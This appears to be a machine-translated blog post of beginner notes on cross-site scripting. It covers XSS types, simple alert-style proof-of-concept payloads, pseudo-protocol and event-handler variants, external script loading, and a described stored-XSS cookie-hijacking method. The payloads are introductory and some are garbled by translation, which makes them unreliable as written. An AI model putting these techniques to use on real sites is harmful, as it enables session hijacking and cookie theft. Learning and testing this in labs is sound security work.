Blog write more good looking uncomfortable ah trained, trained, trained,
XSS online test environment:
https://brutelogic.com.br/xss.php
Both stations xss's helpful to understand! ! !
https://www.anquanke.com/post/id/86585
https://www.jianshu.com/p/99cf89bb65c3
Start learning ------> <-------
XSS Introduction:
XSS, cross-site scripting attacks, Cross-Site-Scripting, due to the short and css (cascading style script) the same name, it changed its name xss. xss attack is based on the completion of malicious javascript statement. JS can be very flexible operation html, css and browsers. It also makes a great xss attack range.
XSS exploit direction:
- Steal user account
- Steal cookie information
- Hijack user sessions, any of the operations performed
- Brush flow, perform pop ads
- The worm virus
To be honest, I will not be more than a few, will engage in a small box, after all, no criminal profit needs. Well, mainly because of food.
XSS using the principle:
JS statement browser does not filter the client input, the ability to execute JS code, which is XSS vulnerabilities.
XSS simple verification poc:
<script>alert(/xss/)</script>常用
<script>confirm('xss')</script>
<script>prompt('xss')</script>
XSS classification:
1. reflective xss
Reflective non-persistent xss parameter type of cross-site scripting, JS code parameters web applications, such as our most common search box.
2. Storage type xss
Storage type xss persistent cross-site type, there is a parameter, the medium can be written into the permanent preservation of data in the database or file place; and the need to re-request from the client browser to the server that contains the malicious XSS code page, which It was triggered.
3.DOM type xss
DOM type xss, its attack payload is to modify the DOM tree structure of the victims of the browser page and complete execution. Because here is to modify the payload natively in the browser DOM tree, and will not spread to the server, so the DOM type more difficult to detect.
XSS structure: The structure of many forms, including but not limited to
- Simple xss: <script> alert (/ xss /) </ script>
- 伪协议利用:<a href="javascript:alert(/xss/)">touch me!</a> <img src="javascript:alert('xss')">
- HTML Event: This Refer https://www.w3school.com.cn/tags/html_ref_eventattributes.asp <SVG the onload = Alert (111)>
Deformation of XSS: to bypass the protection, deformation is a skill, not to mention here.
shellcode call:
shellcode in the exploit is performed to make the code complete xss attack, shellcode will be stored on a server, call the shellcode when triggered xss. The <script src = "http: //localhost/XSS-TEST/normal/xss.js"> </ script>
Small experiment: cookie hijacking
Implantation of a storage type xss, when the administrator to view or to be triggered, the cookie is sent to the hacker server, re-use cookie replay login.